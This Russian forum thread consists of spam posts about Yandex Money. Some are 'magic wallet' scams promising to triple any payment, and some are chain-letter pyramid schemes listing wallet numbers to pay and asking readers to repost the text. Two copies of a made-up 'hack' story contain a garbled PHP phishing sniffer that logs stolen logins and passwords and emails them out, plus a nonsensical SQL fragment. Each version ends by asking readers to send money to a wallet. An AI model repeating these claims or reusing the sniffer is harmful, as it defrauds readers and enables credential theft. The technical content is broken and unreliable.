Надеюсь вы не ведетесь на все фальшивые кошельки с,якобы,способными удвоить ваш капитал :) Есть только немного ДЕЙСТВИТЕЛЬНО БАГНУТЫХ КОШЕЛЬКОВ,которые приносят +40-50% от отправленного(Я математик,поэтому высчитываю все что вижу) Так вот один из этих кошельков 41001543301276 Кидать надо от 30 рублей!!! Я пробовал меньше,но ничего не приходило! Почему я поделился? Да потому,что я добрый человек! В нашем мире так мало добра... Хоть кто-то должен это сделать :) Удачи! [/b][

0

198

Волшебный кошелек 410011695611646
региструетесь на яндекс деньги, кладете на счет 100 рублей, отправляете 100 рублей на счет 410011695611646, через 5-10 минут приходят деньги.
Например 150 рублей-450 рублей, но отправляйте не больше 600 рублей. Не более 3-х раз в день.

0

199

Всем привет, расскажу вам простой способ, как я нашел баг в "яндекс деньги" может это даже и не баг, но я прыгал от радости  минут 5,  :jumping: . Все что я сделал это ввел в яндексе "волшебный кошелек" не помню куда зашел и увидел информацию об этом, зашел , там было написанно про какойто бонус, я сначало не понял, думал фигня, но попробовал кинуть на какойто лицевой (КОТОРЫЙ БЫЛ УКАЗАН) счет 15 рублей ( больше не было), подождал минут 30,  И МНЕ ПРИШЛО 45 Р.!! НЕЗНАЮ СКОЛЬКО НАДО КИДАТЬ И КАКОЕ КОЛИЧЕСТВО РАЗ В СУТКИ ( НЕ ПРОБОВАЛ) НО 1 РАЗ МОЖНО ДУМАЮ ПОПРОБОВАТЬ!
PS. ЛИЦЕВОЙ СЧЕТ БЫЛ ТАКОЙ : 410011103145568
ПОПРОБУЙТЕ КИНУТЬ НАПРИМЕР НЕ БОЛЬШЕ 90 РУБЛЕЙ.

0

200

sanyaboroda написал(а):

Всем привет, расскажу вам простой способ, как я нашел баг в "яндекс деньги" может это даже и не баг, но я прыгал от радости  минут 5,   . Все что я сделал это ввел в яндексе "волшебный кошелек" не помню куда зашел и увидел информацию об этом, зашел , там было написанно про какойто бонус, я сначало не понял, думал фигня, но попробовал кинуть на какойто лицевой (КОТОРЫЙ БЫЛ УКАЗАН) счет 15 рублей ( больше не было), подождал минут 30,  И МНЕ ПРИШЛО 45 Р.!! НЕЗНАЮ СКОЛЬКО НАДО КИДАТЬ И КАКОЕ КОЛИЧЕСТВО РАЗ В СУТКИ ( НЕ ПРОБОВАЛ) НО 1 РАЗ МОЖНО ДУМАЮ ПОПРОБОВАТЬ!
PS. ЛИЦЕВОЙ СЧЕТ БЫЛ ТАКОЙ : 410011103145568
ПОПРОБУЙТЕ КИНУТЬ НАПРИМЕР НЕ БОЛЬШЕ 90 РУБЛЕЙ.

НИХЕРА НЕ ПРИШЛИ ТВОИ ДЕНЬГИ!! КИНУЛ 50 РУБЛЕЙ ЖДУ УЖЕ 35 МИНУТ!!

0

201

vasya2013 написал(а):

НИХЕРА НЕ ПРИШЛИ ТВОИ ДЕНЬГИ!! КИНУЛ 50 РУБЛЕЙ ЖДУ УЖЕ 35 МИНУТ!!

ПРОШУ ПРОЩЕНИЯ ЗА КАПС И Т.Д) ДЕНЬГИ ПРИШЛИ,) С 50 РУБЛЕЙ ПРИШЛО 150РУБЛЕЙ!! :cool:
ПОДСКАЖИТЕ ПОЖАЛУЙСТА ГДЕ ВЫ НАШЛИ ЭТУ СТРАНИЦУ?

0

202

Кто хочет заработать читайте внимательно!!! Я Вас уверяю Ваше материальное положение резко улучшится, если Вы этого только захотите!!!!!!! (Понимаю с каким недоверием вы это читаете - но продолжайте, прошу, дочитайте статью до конца). СРАЗУ СКАЖУ, КОГДА ЗАРАБОТАЕТЕ СВОИ ПЕРВЫЕ ТЫСЯЧИ ДВЕ, ПОТРАТЬТЕ ИХ НА РАССКРУТКУ РЕКЛАМЫ ЭТОГО СООБЩЕНИЯ!!! И ВЫ УВИДЕТЕ РЕЗУЛЬТАТ!!! По прошествии всего 2 месяцев, я получил 155 000 руб. И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10р. И это все только за цену в 70 руб.!!! Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света… Я купил всё, что мне надо… И это очень кстати, согласитесь!?... Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой, что никаким начальникам и руководителям даже и не снился!!! ВОТ ТЕ САМЫЕ 2 ШАГА К УСПЕХУ: 1. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб, вписав этот номер в поле "Номер счёта". В поля "Имя получателя" и "E-mail получателя" вписывать ничего не нужно. В поле "Контракт/назначение платежа" напишите - "Пожалуйста, внесите меня в список Яndex кошельков". Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 7 кошельков (не забудьте вписывать в поле "Контракт/назначение платежа" "Пожалуйста, внесите меня в список Яndex кошельков"): 1) 41001297354413  2) 41001299172898  3) 41001513905363  4) 41001507563134  5) 410011196012060  6) 410011157694570  7)410011714182873 ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го,7-ой на место 6-го. А в 7-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!! 2. Разместите эту статью на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!!, в течение двух месяцев!!! БОЛЬШЕ РАЗМЕЩЕНИЙ - БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!! ЭТО СТОИТ 70 рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ - ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 70РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!?

0

203

Итак,Вот реальный способ зароботать на яндекс кошельке КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ 15000 РУБЛЕЙ.
Я расскажу вам:
1. Как наглые лохотронщики обманывают людей на сумму в размере 5000 рублей (Яндекс-Деньги), а некоторых на еще большие суммы.
2. Как обмануть лохотронщиков и заработать 15000 рублей (Яндекс-Деньги)
Тема 1. История « Как я лохонул их и получаю стабильно 15000 рублей » Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе Яндекс-Деньги волшебный кошелек, и все что вы на него пошлете вернется вам в утроенном размере!!! Любая сумма от 130 рублей и выше! Пошлете десять тысяч получите тридцать тысяч и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже… Я не поверил, но для теста послал 130 рублей. Через где-то 5 часов проверил свой Яндекс кошелек и обнаружил перевод в 390 рублей! Я удивился. Послал потом еще 130 рублей опять то же самое. Потом послал 300 рублей, мне пришло 900. Осмелев окончательно послал все что у меня было – около 5000 рублей … Что было дальше, думаю, вы уже поняли. Никаких 15000 рублей мне никто не прислал, да и мои 5000 тоже исчезли навсегда… Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 100 рублей и примерно до 800 рублей (закидывал им 900 рублей и их забрали, а 800 закинул программа вернула 2400 рублей) Вот и заколачивают тысячи! В общем, это я к тому, что если быть аккуратным и выслать, небольшую сумму (они принимают любые суммы, но не меньше 130 рублей), то всегда можно получать в три раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до 800 рублей они не забирают никогда. То есть, послав 800 рублей вы в любом случае получите 2400 рублей, т.к. сумма мелкая и они будут ждать пока вы пришлете больше. Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана. Я сейчас зарабатываю на этом около 15000 рублей в неделю (можно делать и больше). Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках сотни тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить. ВОТ САМ КОШЕЛЁК: 41001812611946 Совет: Внимание! Повторяю! ставку поднимать не стоит, т.к. если ставка выше 800 рублей то программа их забирает даже и не пробуйте!!! Я делаю то же самое и получаю около 15000 в неделю, которых мне очень даже вполне хватает! В общем, я рассказал, что от меня требовалось. Дальше – ваше дело..   ВНИМАНИЕ!!! НЕ СОВЕТУЮ ОТСЫЛАТЬ МЕНЕЕ 130Р ЭТО МОЖЕТ ПРИВЕСТИ К СБОЮ В СИСТЕМЕ КОШЕЛЬКА!!! И ВАШИ ДЕНЬГИ НЕ ВЕРНУТСЯ!!!
3.  410011606552313
4.  410011592677639
5.   410011592682692 
6.  410011593597730
7.  410011608982747

0

204

http://pomoguru.taba.ru/ Эта ссылка реально работает!Я сам офигел!
Привет всем!!! Сейчас я расскажу, как я взломал яндекс деньги.

«Как Все начиналось»
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный наyandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса  присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a  продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал  пороль карты на мыло , вот код сниффера:
<?
}
$text="[".date("d.m.y H:i"."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a";
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' methodost>
<INPUT type=hidden nameass value='$_POST[pass]'>
</FORM>";
?>
Для проверки проделанной работы мы кинули  50 руб на этот номер кошелька  410011386031284
19:39
И на мой кошель минут через 5 пришло 1000 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом  pixcher'a  решили еще раз протестировать наш баг и кинуть 100 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез Запрос к БД на число 10 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 1000 рублей. Как видишь, даже раскрученный проект имеет ошибки.
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести  и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет
410011386031284
19:40
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '1000''
Вот пример :
id =
19:41
410011386031284
cc.content_id
10. Все дело сделано ждем минут 5 и к вам должны прийти 1000 рублей. Проверена  это уже на многих компах так что дерзайте.

Отредактировано не совсем тупой (2013-02-17 09:33:49)

0

205

Привет всем!!! Сейчас я расскажу, как я взломал яндекс деньги.

«Как Все начиналось»
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный наyandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса  присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a  продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал  пороль карты на мыло , вот код сниффера:
<?
}
$text="[".date("d.m.y H:i"."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a";
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' methodost>
<INPUT type=hidden nameass value='$_POST[pass]'>
</FORM>";
?>
Для проверки проделанной работы мы кинули  50 руб на этот номер кошелька  410011386031284
И на мой кошель минут через 5 пришло 1000 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом  pixcher'a  решили еще раз протестировать наш баг и кинуть 100 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез Запрос к БД на число 10 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 1000 рублей. Как видишь, даже раскрученный проект имеет ошибки.
2. Заводим почтовый ящик
3. Заводим яндекс счет
5. Теперь нажимаем перевести  и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет
410011386031284
19:40
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '1000''
Вот пример :
id =
410011386031284
cc.content_id
10. Все дело сделано ждем минут 5 и к вам должны прийти 1000 рублей. Проверена  это уже на многих компах так что дерзайте

0

206

ЧТЕНИЕ ЕЩЕ НИКОМУ НЕ ПОВРЕДИЛО .
Я предлагаю Вам вещь, к которой и сама относилась поначалу  с недоверием. Первая моя мысль: «Очередной лохотрон , которым просто напичкан интернет». Но все равно решила попробовать. Я молодая мама, сижу в декрете. Возможности устроиться на работу у меня не было. Денег катастрофически не хватало. А у кого есть дети, знают, сколько этих самых денег нужно. И я решила попробовать. Ведь я от этого ничего не потеряю, а возможно и приобрету.
То, что Вы читаете – не имеет никакого отношения к рекламе или мошенничеству. Этот проект абсолютно реален,и он работает.Попробуйте и убедитесь в этом сами!Золотых гор я Вам не обещаю, как это обещают Вам люди в подобных сообщениях (аж по 150000р. за месяц).Ну это же откровенный обман. В газетах пишут,что наш президент получает такую зарплату.Неужели и мы можем получать столько же, при этом сидя дома за компьютером))) Но неплохую подработку примерно в 10000 р.(может меньше,может больше.это уж как Вы постараетесь) я Вам гарантирую.А теперь от слов к делу.Все прекрасно знают,что дело,в которое вкладывали ноль собственных средств,нулем и обернется.Поэтому вложения всегда нужны.В данном случае они минимальны и составляют в общей сложности 60 рублей.Согласитесь,сумма просто смешная и глупо не попробовать.В жизни мы тратим намного большие суммы на абсолютно не нужные нам вещи.Так почему бы не попробовать за такие маленькие деньги изменить свою жизнь к лучшему. Следуйте,пожалуйста,дальнейшим инструкциям и у Вас все получится.
Шаг №1. Зарегистрируйтесь с системе YANDEX MONEY, которая
находится по адресу http://money.yandex.ru, хорошенько
ознакомьтесь с данной системой как она работает,
выберите оптимальный для себя вариант пополнения кошелька
и внесите 70 рублей на свой кошелёк. Если вы находитесь
в Украине, то создаете свой КОШЕЛЕК с помощью Интернет.
Деньги Украинской версии на http://www.imoney.com.ua/download/index.ru.htm.Там
создаете 2 счета: первый – в гривнах, второй – в
российских рублях. Затем пополняете
свой счет в грн. - см.
http://imoney.com.ua/shops/exch.ru.htm , и с помощью
обменников на http://imoney.com.ua/shops/exch.ru.htm
переправляете эти деньги на свой «рублевый» счет.
Если вы находитесь в ЛЮБОЙ ДРУГОЙ ЦИВИЛИЗОВАННОЙ СТРАНЕ,
то создайте КОШЕЛЕК WebMoney на http://www.webmoney.ru,
с помощью которого вы легко сможете обменять свои честно
заработанные рубли на доллары или евро в любом
обменнике (например, здесь http://obmendeneg.com).
Сразу возникнет проблема внесения денег на счет,
скорее всего, придется сходить в ближайший банк,
или терминал для оплаты сотовой связи
(адреса можно найти на http://money.yandex.ru), но
поверьте один раз стоит сходить для последующего заработка! Вообще, все на сайте расписано и понятно.
Шаг №2. Возьмите первый номер кошелька из нижеуказанного
списка. Отправьте на него 10 руб.05коп(с учетом комиссии Яндекс), вписав этот номер в поле «Номер счёта».
В поле «название платежа для истории» напишите
по аналогии отправьте по 10 руб.05 коп. на следующие 5
кошельков (не забудьте вписывать в поле «название платежа для истории» -«Пожалуйста, внесите меня в список Яndex кошельков»):
1) 410011606586650
2)  41001615407722
3)  410011806902384
4) 410011789190712
5) 410011806907451
6)  410011806911178
КАЖДЫЙ из этих 6 кошельков ровно по 10 руб. - иначе, сетевыми
до конца (можно в формате txt или ещё как вам удобней). Можно написать по-своему,основные моменты должны быть прежними.Я в начале письма изложила свою истинную жизненную ситуацию,а Вы можете изложить свою.
Вашего КОШЕЛЬКА!!!
В случае возникновения проблем с Яндекс кошельком советую
обращаться НА ЭТУ страничку: http://feedback.yandex.ru/?from=money.
3. Разместите эту статью (или объявление с ссылкой на
самых малопосещаемых, ГАРАНТИРУЕТ Вам доход  10000 руб. в месяц.
БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД ! 
Займитесь этим сейчас - не откладывая на завтра….!!! ВРЕМЯ - ДЕНЬГИ!!!
Но поработать все же придется. Необходимо заинтересовать людей.
Для этого следует воспользоваться рассылкой,
размещением объявлений на специализированных
сайтах о поисках работы, форумах, досках объявлений.
Удачи Вам!!!

0

207

ЧТЕНИЕ ЕЩЕ НИКОМУ НЕ ПОВРЕДИЛО .
Я предлагаю Вам вещь, к которой и сама относилась поначалу  с недоверием. Первая моя мысль: «Очередной лохотрон , которым просто напичкан интернет». Но все равно решила попробовать. Я молодая мама, сижу в декрете. Возможности устроиться на работу у меня не было. Денег катастрофически не хватало. А у кого есть дети, знают, сколько этих самых денег нужно. И я решила попробовать. Ведь я от этого ничего не потеряю, а возможно и приобрету.
То, что Вы читаете – не имеет никакого отношения к рекламе или мошенничеству. Этот проект абсолютно реален,и он работает.Попробуйте и убедитесь в этом сами!Золотых гор я Вам не обещаю, как это обещают Вам люди в подобных сообщениях (аж по 150000р. за месяц).Ну это же откровенный обман. В газетах пишут,что наш президент получает такую зарплату.Неужели и мы можем получать столько же, при этом сидя дома за компьютером))) Но неплохую подработку примерно в 10000 р.(может меньше,может больше.это уж как Вы постараетесь) я Вам гарантирую.А теперь от слов к делу.Все прекрасно знают,что дело,в которое вкладывали ноль собственных средств,нулем и обернется.Поэтому вложения всегда нужны.В данном случае они минимальны и составляют в общей сложности 60 рублей.Согласитесь,сумма просто смешная и глупо не попробовать.В жизни мы тратим намного большие суммы на абсолютно не нужные нам вещи.Так почему бы не попробовать за такие маленькие деньги изменить свою жизнь к лучшему. Следуйте,пожалуйста,дальнейшим инструкциям и у Вас все получится.
Шаг №1. Зарегистрируйтесь с системе YANDEX MONEY, которая
находится по адресу http://money.yandex.ru, хорошенько
ознакомьтесь с данной системой как она работает,
выберите оптимальный для себя вариант пополнения кошелька
и внесите 70 рублей на свой кошелёк. Если вы находитесь
в Украине, то создаете свой КОШЕЛЕК с помощью Интернет.
Деньги Украинской версии на http://www.imoney.com.ua/download/index.ru.htm.Там
создаете 2 счета: первый – в гривнах, второй – в
российских рублях. Затем пополняете
свой счет в грн. - см.
http://imoney.com.ua/shops/exch.ru.htm , и с помощью
обменников на http://imoney.com.ua/shops/exch.ru.htm
переправляете эти деньги на свой «рублевый» счет.
Если вы находитесь в ЛЮБОЙ ДРУГОЙ ЦИВИЛИЗОВАННОЙ СТРАНЕ,
то создайте КОШЕЛЕК WebMoney на http://www.webmoney.ru,
с помощью которого вы легко сможете обменять свои честно
заработанные рубли на доллары или евро в любом
обменнике (например, здесь http://obmendeneg.com).
Сразу возникнет проблема внесения денег на счет,
скорее всего, придется сходить в ближайший банк,
или терминал для оплаты сотовой связи
(адреса можно найти на http://money.yandex.ru), но
поверьте один раз стоит сходить для последующего заработка! Вообще, все на сайте расписано и понятно.
Шаг №2. Возьмите первый номер кошелька из нижеуказанного
списка. Отправьте на него 10 руб.05коп(с учетом комиссии Яндекс), вписав этот номер в поле «Номер счёта».
В поле «название платежа для истории» напишите
по аналогии отправьте по 10 руб.05 коп. на следующие 5
кошельков (не забудьте вписывать в поле «название платежа для истории» -«Пожалуйста, внесите меня в список Яndex кошельков»):
1) 410011606586650
2)  41001615407722
3)  410011806902384
4) 410011789190712
5) 410011806907451
6)  410011806911178
КАЖДЫЙ из этих 6 кошельков ровно по 10 руб. - иначе, сетевыми
до конца (можно в формате txt или ещё как вам удобней). Можно написать по-своему,основные моменты должны быть прежними.Я в начале письма изложила свою истинную жизненную ситуацию,а Вы можете изложить свою.
Вашего КОШЕЛЬКА!!!
В случае возникновения проблем с Яндекс кошельком советую
обращаться НА ЭТУ страничку: http://feedback.yandex.ru/?from=money.
3. Разместите эту статью (или объявление с ссылкой на
самых малопосещаемых, ГАРАНТИРУЕТ Вам доход  10000 руб. в месяц.
БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД ! 
Займитесь этим сейчас - не откладывая на завтра….!!! ВРЕМЯ - ДЕНЬГИ!!!
Но поработать все же придется. Необходимо заинтересовать людей.
Для этого следует воспользоваться рассылкой,
размещением объявлений на специализированных
сайтах о поисках работы, форумах, досках объявлений.
Удачи Вам!!!

0

208

Есть две очень разные вещи. Первая - работать, а вторая - зарабатывать. Так вот многие из нас работают, но нельзя сказать, что зарабатывают. Так вот. .. Я и хотел бы рассказать, как можно зарабатывать деньги в Интернете.
И не спешите закрывать страницу, со словами: "Лохотрон!!!"
Я только прошу Вас потратить немного времени на прочтение данной странички. Ну а дальше... Дальше уже Вам решать. Наткнулся я на это совершенно случайно, когда искал работу для дополнительного заработка, найдя статью, в которой говорилось, что МОЖНО СДЕЛАТЬ СОТНИ ТЫСЯЧ РУБЛЕЙ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 70 РУБ.
Дальше там говорилось, что надо послать по 10 руб. на 7 Internet-кошельков, которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка, тем самым, сместив список на одну строчку вверх. В результате чего седьмая строчка освобождается, куда Вы вписываете номер своего Internet-кошелька. Затем Вы закидываете данное сообщение, но уже с ВАШИМИ ДАННЫМИ на седьмой строчке, на 200 разных форумов.
Никаких уловок. Ну, я поразмышлял и подумал, что в принципе ничего не теряю кроме 70 руб., и решил попробовать.
Установил Интернет-кошелёк, перечислил всем участникам акции по 10 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 2-х дней я зарегистрировался на более чем 100 бизнес-форумах и бесплатных досках объявлений.
Прошла неделя, заглядываю в свой Интернет-кошелек, и угадайте ЧТО!!!! Поступлений никаких нет, вообще. А разные участники пишут, что за неделю заработали кто по 750 руб., кто по 450 руб… Пиши-пропало, подумал я, попал в очередной лохотрон, желая заработать за пару недель десятки тысяч рублей. Ну и бросил это занятие, так и не дослав свое объявление до 200 форумов. Ещё через неделю (ради любопытства) заглянул в свой Интернет-кошелек. Смотрю, всего одно поступление 10 руб. Да, думаю, дело не стоящее, случайно нашелся такой же наивный, как и я...
Ещё через две недели я все-таки снова открыл свой Интернет-кошелек, а в нем уже около 900 руб.
Откуда? Непонятная картина, но всё равно за 1 месяц 900 руб. это очень мало, как пишут предыдущие участники - они за 1 месяц заработали десятки тысяч долларов. И вдруг после 1 месяца началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ, спустя ещё 2 недели на моем счету уже было более 30 000 руб.
После этого я отправил свои объявления ещё более чем на 150 форумов.
РЕЗУЛЬТАТ БЫЛ ОЩЕЛОМЛЯЮЩИЙ! По прошествии всего 2 месяцев, я получил 141 000 руб.
И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10-30 руб.
И это все только за цену в 70 руб.!!!
Моя работа теперь - это каждый день по 2 часа в Интернете и ВСЁ!!!!
А заработок такой, что никаким начальникам и руководителям даже и не снился!!!
Теперь, я расскажу Вам, как это работает, и самое главное ПОЧЕМУ!
Я Вам обещаю, что если вы будете в точности соблюдать ниже перечисленные инструкции, то Вы начнете получать намного больше денег, чем Вы думали, не прилагая к этому особых усилий. Согласитесь, это просто!!! И ЭТО СОВЕРШЕННО ЛЕГАЛЬНО. И ВАШ ВКЛАД СОСТАВЛЯЕТ ВСЕГО 70 РУБЛЕЙ...
ВАЖНО: ЭТО НЕ ОБМАН И ПРИ ЭТОМ ВЫ НИЧЕМ НЕ РИСКУЕТЕ, НО ЭТО РАБОТАЕТ!!!
ВНИМАНИЕ!!! ПРОЧТИТЕ ЭТО ПАРУ РАЗ!!!
Следуйте инструкциям в ТОЧНОСТИ и 180 000 руб. И БОЛЬШЕ будут Вашими в течение двух месяцев!!!
Всё это удачно работает благодаря ЧЕСТНОСТИ участников. ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
Шаг №1. Зарегистрируйтесь в системеYANDEX MONEY, хорошенько ознакомьтесь с данной системой, как она работает, выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей на свой кошелёк + еще комиссию, которую снимает система за перевод 0,5%. Итого 70 рублей 35 копеек.
Сразу возникнет вопрос: "Как внести деньги?" и "Как снять?" На сегодняшний день нет ни чего проще. Это можно сделать при помощи терминалов по приему платежей, в точках по приему платежей, в банке, на почте и т.д. А также информацию Вы сможете найти на сайте.
Шаг №2. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб., вписав этот номер в поле "Номер счёта:". В поля Имя получателя и E-mail получателя вписывать ничего не нужно. В поле Контракт/назначение платежа напишите: ”Пожалуйста, внесите меня в список Яndex кошельков”. (без кавычек) Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 6 кошельков (не забудьте вписывать в поле: Контракт/назначение платежа: "Пожалуйста, внесите меня в список Яndex кошельков").
1) 41001147374243
2) 41001153422977
3) 41001155407445
4) 41001982249599
5) 41001969569742
6) 41001998404757
7) 41001623856811
